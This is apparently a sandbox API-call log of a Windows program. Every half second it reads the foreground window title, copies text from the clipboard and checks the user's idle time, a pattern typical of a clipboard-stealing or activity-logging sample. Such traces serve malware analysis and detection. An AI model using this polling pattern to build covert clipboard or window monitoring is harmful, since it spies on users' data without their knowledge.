[0232.862] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0232.862] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0232.862] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0232.862] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0232.862] GetTickCount () returned 0x1d49517
[0232.862] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0232.862] Sleep (dwMilliseconds=0x1f4)
[0233.384] GetForegroundWindow () returned 0x103ca
[0233.384] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0233.384] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0233.384] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0233.384] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f99
[0233.384] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f99, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0233.384] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0233.384] OpenClipboard (hWndNewOwner=0x0) returned 1
[0233.384] GetClipboardData (uFormat=0x1) returned 0x5433b0
[0233.385] CloseClipboard () returned 1
[0233.385] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0233.385] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0233.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0233.385] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0233.385] GetTickCount () returned 0x1d4971b
[0233.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0233.385] Sleep (dwMilliseconds=0x1f4)
[0233.890] GetForegroundWindow () returned 0x100e4
[0233.890] GetWindowTextLengthA (hWnd=0x100e4) returned 10
[0233.890] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0233.890] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0233.890] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206fc9
[0233.890] GetWindowTextA (in: hWnd=0x100e4, lpString=0x2206fc9, nMaxCount=11 | out: lpString="FolderView") returned 10
[0233.890] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0233.890] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0233.890] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0233.890] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0233.893] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0233.893] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0233.893] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0233.893] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0233.893] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0233.893] OpenClipboard (hWndNewOwner=0x0) returned 1
[0233.893] GetClipboardData (uFormat=0x1) returned 0x5434a0
[0233.893] CloseClipboard () returned 1
[0233.893] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0233.893] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0233.893] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0233.893] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0233.893] GetTickCount () returned 0x1d4991e
[0233.893] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0233.893] Sleep (dwMilliseconds=0x1f4)
[0234.420] GetForegroundWindow () returned 0x103ca
[0234.421] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0234.421] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0234.421] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0234.421] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f69
[0234.421] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f69, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0234.421] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0234.421] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0234.421] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0234.421] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0234.421] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0234.421] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0234.421] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0234.421] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0234.421] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0234.421] OpenClipboard (hWndNewOwner=0x0) returned 1
[0234.422] GetClipboardData (uFormat=0x1) returned 0x543320
[0234.423] CloseClipboard () returned 1
[0234.423] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0234.423] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0234.423] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0234.423] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0234.424] GetTickCount () returned 0x1d49b32
[0234.424] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0234.424] Sleep (dwMilliseconds=0x1f4)
[0234.936] GetForegroundWindow () returned 0x103ca
[0234.936] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0234.936] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0234.936] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0234.936] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0234.936] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206d89, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0234.936] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0234.936] OpenClipboard (hWndNewOwner=0x0) returned 1
[0234.936] GetClipboardData (uFormat=0x1) returned 0x5434d0
[0234.936] CloseClipboard () returned 1
[0234.936] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0234.937] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0234.937] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0234.937] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0234.937] GetTickCount () returned 0x1d49d35
[0234.937] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0234.937] Sleep (dwMilliseconds=0x1f4)
[0235.451] GetForegroundWindow () returned 0x103ca
[0235.451] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0235.451] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0235.451] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0235.451] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0235.451] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206d89, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0235.451] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0235.451] OpenClipboard (hWndNewOwner=0x0) returned 1
[0235.452] GetClipboardData (uFormat=0x1) returned 0x543680
[0235.452] CloseClipboard () returned 1
[0235.452] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0235.452] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0235.452] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0235.452] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0235.452] GetTickCount () returned 0x1d49f39
[0235.452] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0235.452] Sleep (dwMilliseconds=0x1f4)
[0235.968] GetForegroundWindow () returned 0x103ca
[0235.968] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0235.968] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0235.968] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0235.968] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0235.968] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206d89, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0235.968] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0235.968] OpenClipboard (hWndNewOwner=0x0) returned 1
[0235.968] GetClipboardData (uFormat=0x1) returned 0x543680
[0235.969] CloseClipboard () returned 1
[0235.969] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0235.969] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0235.969] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0235.969] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0235.969] GetTickCount () returned 0x1d4a13d
[0235.969] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0235.969] Sleep (dwMilliseconds=0x1f4)
[0236.482] GetForegroundWindow () returned 0x100e4
[0236.482] GetWindowTextLengthA (hWnd=0x100e4) returned 10
[0236.483] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0236.483] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0236.483] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22070e9
[0236.483] GetWindowTextA (in: hWnd=0x100e4, lpString=0x22070e9, nMaxCount=11 | out: lpString="FolderView") returned 10
[0236.483] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0236.483] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0236.483] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0236.483] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0236.483] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0236.483] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0236.483] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0236.483] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0236.483] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0236.483] OpenClipboard (hWndNewOwner=0x0) returned 1
[0236.483] GetClipboardData (uFormat=0x1) returned 0x543530
[0236.483] CloseClipboard () returned 1
[0236.483] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0236.483] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0236.483] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0236.483] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0236.483] GetTickCount () returned 0x1d4a340
[0236.483] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0236.483] Sleep (dwMilliseconds=0x1f4)
[0237.014] GetForegroundWindow () returned 0x103ca
[0237.014] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0237.014] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0237.014] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0237.014] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22070b9
[0237.014] GetWindowTextA (in: hWnd=0x103ca, lpString=0x22070b9, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0237.014] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0237.014] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0237.014] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0237.014] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0237.014] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0237.015] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0237.015] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0237.015] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0237.015] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0237.015] OpenClipboard (hWndNewOwner=0x0) returned 1
[0237.015] GetClipboardData (uFormat=0x1) returned 0x543530
[0237.015] CloseClipboard () returned 1
[0237.015] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0237.015] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0237.015] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0237.015] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0237.015] GetTickCount () returned 0x1d4a553
[0237.015] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0237.015] Sleep (dwMilliseconds=0x1f4)
[0237.530] GetForegroundWindow () returned 0x103ca
[0237.530] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0237.530] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0237.530] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0237.530] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f69
[0237.530] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f69, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0237.530] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0237.530] OpenClipboard (hWndNewOwner=0x0) returned 1
[0237.530] GetClipboardData (uFormat=0x1) returned 0x543680
[0237.530] CloseClipboard () returned 1
[0237.531] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0237.531] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0237.531] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0237.531] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0237.531] GetTickCount () returned 0x1d4a757
[0237.531] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0237.531] Sleep (dwMilliseconds=0x1f4)
[0238.045] GetForegroundWindow () returned 0x103ca
[0238.045] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0238.045] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0238.045] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0238.045] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0238.045] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206d89, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0238.046] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0238.046] OpenClipboard (hWndNewOwner=0x0) returned 1
[0238.046] GetClipboardData (uFormat=0x1) returned 0x543680
[0238.046] CloseClipboard () returned 1
[0238.046] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0238.046] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0238.046] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0238.046] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0238.046] GetTickCount () returned 0x1d4a95b
[0238.046] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0238.046] Sleep (dwMilliseconds=0x1f4)
[0238.561] GetForegroundWindow () returned 0x103ca
[0238.561] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0238.561] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0238.561] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0238.561] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206e49
[0238.561] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206e49, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0238.561] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0238.561] OpenClipboard (hWndNewOwner=0x0) returned 1
[0238.561] GetClipboardData (uFormat=0x1) returned 0x543470
[0238.561] CloseClipboard () returned 1
[0238.561] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0238.562] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0238.562] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0238.564] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0238.564] GetTickCount () returned 0x1d4ab5e
[0238.564] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0238.564] Sleep (dwMilliseconds=0x1f4)
[0239.076] GetForegroundWindow () returned 0x100e4
[0239.076] GetWindowTextLengthA (hWnd=0x100e4) returned 10
[0239.077] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0239.077] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0239.077] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0239.077] GetWindowTextA (in: hWnd=0x100e4, lpString=0x2206d89, nMaxCount=11 | out: lpString="FolderView") returned 10
[0239.077] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0239.077] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0239.077] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0239.077] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0239.077] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0239.077] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0239.077] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0239.077] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.077] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.077] OpenClipboard (hWndNewOwner=0x0) returned 1
[0239.077] GetClipboardData (uFormat=0x1) returned 0x5433b0
[0239.077] CloseClipboard () returned 1
[0239.078] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0239.078] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0239.078] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156a8
[0239.078] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0239.078] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240fee8
[0239.078] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240fec8
[0239.078] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0239.078] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.078] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.078] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.078] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d49b41)) returned 1
[0239.078] GetTickCount () returned 0x1d4ad62
[0239.078] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0239.078] Sleep (dwMilliseconds=0x1f4)
